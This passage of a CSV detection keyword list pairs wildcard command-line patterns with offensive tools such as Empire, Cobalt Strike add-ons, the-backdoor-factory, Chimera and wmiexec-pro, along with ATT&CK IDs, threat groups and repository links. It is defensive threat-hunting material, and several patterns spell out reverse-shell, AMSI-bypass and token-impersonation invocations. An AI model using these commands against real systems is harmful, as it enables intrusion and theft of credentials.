- T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/pwn1sher/CS-BOFs","1","0","N/A","10","10","100","23","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z" +"* -ExeArguments *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* exec * -p * -c *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"* exec * --pid * --command *","offensive_tool_keyword","impersonate-rs","Reimplementation of Defte Impersonate in plain Rust allow you to impersonate any user on the target computer as long as you have administrator privileges (No NT SYSTEM needed) and is usable with and without GUI","T1134 - T1003 - T1008 - T1071","TA0004 - TA0006 - TA0011","N/A","N/A","Exploitation tools","https://github.com/zblurx/impersonate-rs","1","0","N/A","N/A","1","78","4","2023-06-15T15:33:49Z","2023-01-30T17:11:14Z" +"* exec-command -clear*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* exec-command -command *","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* exec-command -shell*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* -exec-shellcode *","offensive_tool_keyword","gcat","A PoC backdoor that uses Gmail as a C&C server","T1071.001 - T1094 - T1102.002","TA0011 - TA0010 - TA0008","N/A","N/A","C2","https://github.com/byt3bl33d3r/gcat","1","0","N/A","10","10","1300","466","2018-11-16T13:43:15Z","2015-06-03T01:28:00Z" +"* execute *NT AUTHORITY\SYSTEM*cmd /c *","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"* execute NT AUTHORITY\SYSTEM* cmd true bypass*","offensive_tool_keyword","SharpToken","SharpToken is a tool for exploiting Token leaks. It can find leaked Tokens from all processes in the system and use them","T1134 - T1101 - T1214 - T1087 - T1038","TA0004 - TA0007","N/A","N/A","Exploitation tools","https://github.com/BeichenDream/SharpToken","1","0","N/A","N/A","4","353","47","2023-04-11T13:29:23Z","2022-06-30T07:34:57Z" +"* --execution false --save True --output *.bin*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","0","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z" +"* exegol.apk*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* exegol.py*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* exe-selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"* Exfil.sh*","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","N/A","10","4","348","73","2023-09-30T13:40:08Z","2022-03-23T15:52:41Z" +"* exfiltrate.exe*","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","N/A","Exploitation tools","https://github.com/reveng007/Executable_Files","1","0","N/A","10","1","7","2","2023-09-07T08:36:28Z","2021-12-10T15:04:35Z" +"* exiting (due to fatal error)*","greyware_tool_keyword","dns","Detects suspicious DNS error messages that indicate a fatal or suspicious error that could be caused by exploiting attempts","T1071.004 - T1078.004","TA0011 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/ossec/ossec-hids/blob/master/etc/rules/named_rules.xml","1","0","greyware tool - risks of False positive !","N/A","10","4103","1020","2023-08-09T15:42:59Z","2013-09-17T17:07:58Z" +"* Exrop(*/bin/*","offensive_tool_keyword","Exrop","Exrop is automatic ROP chains generator tool which can build gadget chain automatically from given binary and constraints","T1554","TA0003","N/A","N/A","Exploitation tools","https://github.com/d4em0n/exrop","1","0","N/A","N/A","3","265","26","2020-02-21T08:01:06Z","2020-01-19T05:09:00Z" +"* extract --secrets --zsh*","offensive_tool_keyword","PassDetective","PassDetective is a command-line tool that scans shell command history to detect mistakenly written passwords - API keys and secrets","T1059 - T1059.004 - T1552 - T1552.001","TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/aydinnyunus/PassDetective","1","0","N/A","7","1","52","3","2023-08-16T16:51:15Z","2023-07-22T12:31:57Z" +"* --extra-verbose*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* -f *.bin -e AMSI*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"* -f *.bin -e Defender*","offensive_tool_keyword","ThreatCheck","Identifies the bytes that Microsoft Defender / AMSI Consumer flags on","T1059.001 - T1059.005 - T1027.002 - T1070.004","TA0002 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/rasta-mouse/ThreatCheck","1","0","N/A","N/A","8","781","86","2023-04-04T03:06:16Z","2020-10-08T11:22:26Z" +"* -f *.dmp windows.cmdline*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.dlllist --pid *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.filescan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.handles --pid *","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.info*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.malfind*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.netscan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.netstat*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.pslist*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.psscan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.pstree*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.registry.hivelist*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.registry.hivescan*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.registry.printkey*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.dmp windows.registry.printkey*Software\Microsoft\Windows\CurrentVersion*","greyware_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* -f *.exe --encrypt xor --jmp -o *.exe*","offensive_tool_keyword","darkarmour","Store and execute an encrypted windows binary from inside memorywithout a single bit touching disk.","T1055.012 - T1027 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/bats3c/darkarmour","1","0","N/A","10","7","644","119","2020-04-13T10:56:23Z","2020-04-06T20:48:20Z" +"* -f *.exe -m onionduke -b *.dll*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f *.exe -m onionduke -b *.exe*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f *.ps1 -l 3 -o *.ps1 -v -t powershell*reverse*","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -f Find-AllVulns*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"* -f Find-PathDLLHijack*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"* -f Get-DomainGroupMember* -a *-Identity *admin* -Recurse*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"* -f Invoke-Inveigh*","offensive_tool_keyword","SpaceRunner","enables the compilation of a C# program that will execute arbitrary PowerShell code without launching PowerShell processes through the use of runspace.","T1059.001 - T1027","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Mr-B0b/SpaceRunner","1","0","N/A","7","2","185","38","2020-07-26T10:39:53Z","2020-07-26T09:31:09Z" +"* -f kirbi *","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation Tools","https://github.com/dirkjanm/krbrelayx","1","0","N/A","N/A","10","902","148","2023-09-07T20:11:36Z","2019-01-08T18:42:07Z" +"* -f passw -e xlsx csv *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -f passw user admin account network login logon cred *","offensive_tool_keyword","MANSPIDER","Spider entire networks for juicy files sitting on SMB shares. Search filenames or file content - regex supported!","T1046 - T1021 - T1021.002 - T1114 - T1114.001 - T1083","TA0007 - TA0009 - TA0010","N/A","N/A","Discovery","https://github.com/blacklanternsecurity/MANSPIDER","1","0","N/A","8","8","773","119","2023-10-04T11:08:17Z","2020-03-18T13:27:20Z" +"* -f psexec.exe -H * -P * -s reverse_shell_tcp*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f shells/generic1.ps1 *","offensive_tool_keyword","chimera","Chimera is a PowerShell obfuscation script designed to bypass AMSI and commercial antivirus solutions.","T1027.002 - T1059.001 - T1562.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/tokyoneon/Chimera/","1","0","N/A","10","10","1188","225","2021-11-09T12:39:59Z","2020-09-01T07:42:22Z" +"* -f tcpview.exe -s iat_reverse_tcp_inline -H * -P * -m automatic -C*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -f TeamViewer.exe -H * -P * -s *","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -FakeCmdLine *","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","0","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" +"* -FakeCmdLine *","offensive_tool_keyword","SwampThing","SwampThing lets you to spoof process command line args (x32/64). Essentially you create a process in a suspended state - rewrite the PEB - resume and finally revert the PEB. The end result is that logging infrastructure will record the fake command line args instead of the real ones","T1036.005 - T1564.002","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/SwampThing","1","0","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"* -FakeDC * -SamAccountName * -Username *","offensive_tool_keyword","AD exploitation cheat sheet","DCShadow is an attack that masks certain actions by temporarily imitating a Domain Controller. If you have Domain Admin or Enterprise Admin privileges in a root domain it can be used for forest-level persistence.","T1550 - T1555 - T1212 - T1558","N/A","N/A","N/A","Exploitation tools","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* fcrdns.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* --file ownedusers.txt*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"* --file-smuggler-port *","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","0","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"* filetransfer -download -src-file *.exe*/tmp*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* filetransfer -upload -src-file *.exe*\temp*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"* FileZillaPwd*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" +"* finger.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* fingerprint-strings.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* firewalk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"* firewall-bypass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 